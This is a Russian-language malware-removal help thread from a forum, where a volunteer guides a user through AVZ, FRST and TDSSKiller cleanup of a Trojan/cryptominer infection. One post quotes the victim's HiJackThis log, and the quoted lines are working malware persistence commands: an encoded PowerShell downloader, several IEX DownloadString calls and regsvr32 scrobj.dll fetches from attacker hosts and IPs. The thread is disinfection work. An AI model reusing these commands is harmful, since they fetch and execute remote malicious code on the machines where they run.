Страница 2 из 2 Первая 12
Показано с 21 по 31 из 31.

Вирус в harddisc0/dr0 [HEUR:Trojan.Win32.DiskWriter.gen] (заявка № 221626)

  1. #21
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,641
    Вес репутации
    1037
    Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

    Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

    Код:
    begin
    RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
     QuarantineFile('c:\windows\debug\ok.dat','');
     QuarantineFile('c:\windows\help\lsmosee.exe>','');
     QuarantineFile('c:\windows\debug\item.dat>','');
     QuarantineFile('c:\windows\debug\item.dat','');
     QuarantineFile('c:\windows\update.exe>','');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x64');
     RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','x64');
     DeleteFile('c:\windows\update.exe>','64');
     DeleteFile('c:\windows\debug\item.dat','64');
     DeleteFile('c:\windows\debug\item.dat>','64');
     DeleteFile('c:\windows\help\lsmosee.exe>','64');
     DeleteSchedulerTask('Mysa3');
     DeleteSchedulerTask('Mysa2');
     DeleteSchedulerTask('Mysa1');
     DeleteSchedulerTask('Mysa');
     DeleteFile('c:\windows\debug\ok.dat','64');
     DeleteSchedulerTask('ok');
    ExecuteWizard('TSW',2,3,true);
    ExecuteSysClean;
    RebootWindows(true);
    end.
    Внимание! Будет выполнена перезагрузка компьютера. После перезагрузки компьютера выполните скрипт в АВЗ:

    Код:
    begin
    CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Пришлите карантин согласно Приложения 2 правил по красной ссылке Прислать запрошенный карантин вверху темы

    Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).

    Код:
    O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/12/31) - {10e49a45-7af2-4825-8139-dbed31562ca9} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
    O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)
    O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAA6ADgAOAA4ADgALwAyAC4AdAB4AHQAIgApAC4AdAByAGkAbQAoACkAIAAtAHMAcABsAGkAdAAgACIAWwBcAHIAXABuAF0AKwAiAHwAJQB7ACQAbgA9ACQAXwAuAHMAcABsAGkAdAAoACIALwAiACkAWwAtADEAXQA7ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAF8ALAAgACQAbgApADsAcwB0AGEAcgB0ACAAJABuADsAfQA=&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host:8888/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
    Сделайте повторные логи по правилам

    Сделайте лог TDSSKiller.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Бесплатная базовая защита от Лаборатории Касперского => https://www.kaspersky.ru/downloads/t...virus-download

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #22
    Junior Member Репутация
    Регистрация
    22.01.2019
    Сообщений
    15
    Вес репутации
    1
    TDSSKiller нашел в том самом месте угрозу, предложил "лечить". Я подтвердил, произошло лечение, но при перезагрузке компьютера он напрочь завис. Пришлось отключать питание и включать заново. После включения ещё раз прогнал этой прогой, угроз, вроде, нет.
    Логи с TDSSKiller 2 штуки залил, до и после перезагрузки компа с зависанием после лечения.
    Вложения Вложения

  4. #23
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,641
    Вес репутации
    1037
    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
    2. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".
    3. Нажмите кнопку Scan.
    4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
    5. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Бесплатная базовая защита от Лаборатории Касперского => https://www.kaspersky.ru/downloads/t...virus-download

  5. #24
    Junior Member Репутация
    Регистрация
    22.01.2019
    Сообщений
    15
    Вес репутации
    1
    создало 3 текстовых документа, все прикрепил
    Вложения Вложения

  6. #25
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,641
    Вес репутации
    1037
    ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

    1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
    2. Скопируйте приведенный ниже текст в Блокнот в кодировке Юникод и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
      Код:
      CreateRestorePoint:
      CloseProcesses:
      FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-11-08] <==== ATTENTION (Points to *.cfg file)
      FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg [2018-11-08] <==== ATTENTION
      C:\Users\Артем2\AppData\Local\Google\Chrome\User Data\Default\Extensions\lalfiodohdgaejjccfgfmmngggpplmhp
      2019-02-02 23:13 - 2019-02-08 16:44 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\SysWOW64\Drivers\64.exe
      2019-02-02 20:08 - 2019-02-08 13:41 - 000000080 _____ C:\Windows\system32\s
      2019-02-02 20:08 - 2019-02-08 13:41 - 000000078 _____ C:\Windows\system32\ps
      2019-02-02 20:08 - 2019-02-08 13:41 - 000000076 _____ C:\Windows\system32\p
      2018-12-29 02:01 - 2019-02-08 16:44 - 000008756 _____ C:\Windows\system32\c.txt
      2018-12-29 02:01 - 2019-01-01 12:29 - 000336274 _____ C:\Windows\system32\a.txt
      2018-12-29 02:01 - 2018-12-29 02:01 - 000017876 _____ C:\Windows\system32\b.txt
      2018-12-09 15:11 - 2018-12-09 15:11 - 000002121 _____ C:\Windows\system32\nvidia.txt
      2018-12-07 21:14 - 2019-02-08 16:44 - 000027136 _____ (Microsoft Corporation) C:\Windows\system\down.exe
      2018-12-07 21:14 - 2018-12-31 10:09 - 000000406 _____ C:\Windows\config.txt
      2018-12-07 21:14 - 2018-12-31 10:09 - 000000336 _____ C:\Windows\pools.txt
      2018-12-07 21:14 - 2018-12-31 10:09 - 000000084 _____ C:\Program Files\Common Files\xp.dat
      2018-12-07 21:13 - 2019-02-08 16:43 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
      2018-12-07 21:13 - 2018-12-07 21:13 - 000000005 _____ C:\Windows\system32\1.txt
      Folder: C:\Windows\system32\%APPDATA%
      Folder: C:\Windows\SysWOW64\%APPDATA%
      2018-12-07 21:14 - 2018-12-31 10:09 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
      2018-12-07 21:13 - 2019-02-08 16:43 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
      WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
      WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"ProgramChangeConsumer\"",Filter="__EventFilter.Name=\"ProgramChangeFilter\"::
      WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"DeviceChangeConsumer\"",Filter="__EventFilter.Name=\"DeviceChangeFilter\"::
      WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
      WMI:subscription\__EventFilter->ProgramChangeFilter::[Query => select * from RegistryTreeChangeEvent within 10 where Hive = 'HKEY_LOCAL_MACHINE' and RootPath='SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall']
      WMI:subscription\__EventFilter->DeviceChangeFilter::[Query => select * from __instanceOperationEvent within 10 where targetInstance isa 'win32_PnPEntity']
      WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
      WMI:subscription\LogFileEventConsumer->ProgramChangeConsumer::
      WMI:subscription\LogFileEventConsumer->DeviceChangeConsumer::
    3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    4. Обратите внимание, что компьютер будет перезагружен.
    5. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму


    Сделайте новые логи FRST.txt, Addition.txt
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Бесплатная базовая защита от Лаборатории Касперского => https://www.kaspersky.ru/downloads/t...virus-download

  7. #26
    Junior Member Репутация
    Регистрация
    22.01.2019
    Сообщений
    15
    Вес репутации
    1
    Сделал, вроде ошибок при выполнении или при перезагрузках компа не выскакивало
    Вложения Вложения

  8. #27
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,641
    Вес репутации
    1037
    Логи в порядке.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Бесплатная базовая защита от Лаборатории Касперского => https://www.kaspersky.ru/downloads/t...virus-download

  9. #28
    Junior Member Репутация
    Регистрация
    22.01.2019
    Сообщений
    15
    Вес репутации
    1
    Вот теперь, думаю, точно вылечили.
    Спасибо большое за помощь!)

  10. #29
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,641
    Вес репутации
    1037
    • Для профилактики и защиты от повторных заражений загрузите SecurityCheck by glax24 отсюда и сохраните утилиту на Рабочем столе
    • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7)
    • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    • Прикрепите отчет в вашей теме
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Бесплатная базовая защита от Лаборатории Касперского => https://www.kaspersky.ru/downloads/t...virus-download

  11. #30
    Junior Member Репутация
    Регистрация
    22.01.2019
    Сообщений
    15
    Вес репутации
    1
    Вот
    Вложения Вложения

  12. #31
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для mike 1
    Регистрация
    05.11.2011
    Адрес
    Москва
    Сообщений
    42,641
    Вес репутации
    1037
    Обновите:

    Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
    ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^

    Автоматическое обновление отключено - рекомендуется включить

    ------------------------------- [ HotFix ] --------------------------------
    HotFix KB3115858 Внимание! Скачать обновления
    HotFix KB3140735 Внимание! Скачать обновления
    HotFix KB3138910 Внимание! Скачать обновления
    HotFix KB3138962 Внимание! Скачать обновления
    HotFix KB3145739 Внимание! Скачать обновления
    HotFix KB3146963 Внимание! Скачать обновления
    HotFix KB3156013 Внимание! Скачать обновления
    HotFix KB3156016 Внимание! Скачать обновления
    HotFix KB3155178 Внимание! Скачать обновления
    HotFix KB3153171 Внимание! Скачать обновления
    HotFix KB3170455 Внимание! Скачать обновления
    HotFix KB3178034 Внимание! Скачать обновления
    HotFix KB3185911 Внимание! Скачать обновления
    HotFix KB3184122 Внимание! Скачать обновления
    HotFix KB3192391 Внимание! Скачать обновления
    HotFix KB3197867 Внимание! Скачать обновления
    HotFix KB3205394 Внимание! Скачать обновления
    HotFix KB4012212 Внимание! Скачать обновления
    HotFix KB4019263 Внимание! Скачать обновления
    HotFix KB4022722 Внимание! Скачать обновления
    HotFix KB4015546 Внимание! Скачать обновления
    HotFix KB4025337 Внимание! Скачать обновления
    HotFix KB4034679 Внимание! Скачать обновления
    HotFix KB4041678 Внимание! Скачать обновления
    HotFix KB4056894 Внимание! Скачать обновления
    HotFix KB4056897 Внимание! Скачать обновления
    HotFix KB4074587 Внимание! Скачать обновления
    HotFix KB4103712 Внимание! Скачать обновления
    HotFix KB4343899 Внимание! Скачать обновления
    HotFix KB4457145 Внимание! Скачать обновления
    HotFix KB4462923 Внимание! Скачать обновления
    HotFix KB4480970 Внимание! Скачать обновления
    HotFix KB4487345 Внимание! Скачать обновления

    WinRAR 5.31 (64-разрядная) v.5.31.0 Внимание! Скачать обновления
    Skype, версия 8.34 v.8.34 Внимание! Скачать обновления
    Opera Stable 57.0.3098.116 v.57.0.3098.116 Внимание! Скачать обновления
    ^Проверьте обновления через меню О программе!^
    Yandex v.19.1.0.2644 Внимание! Скачать обновления
    ^Проверьте обновления через меню Дополнительно - О браузере Yandex!^

    На этом все.
    Инструкции выполняются в том порядке, в котором они вам даны.
    А вы совершаете эти 4 ошибки на форумах? Оставить отзыв Обучение на VirusInfo
    Защита от неизвестных троянцев-шифровальщиков => FixSecurity, Kaspersky Anti-Ransomware Tool
    Интересный блог Андрея Иванова по шифровальщикам
    Бесплатная базовая защита от Лаборатории Касперского => https://www.kaspersky.ru/downloads/t...virus-download

  13. Это понравилось:


Страница 2 из 2 Первая 12

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01318 seconds with 17 queries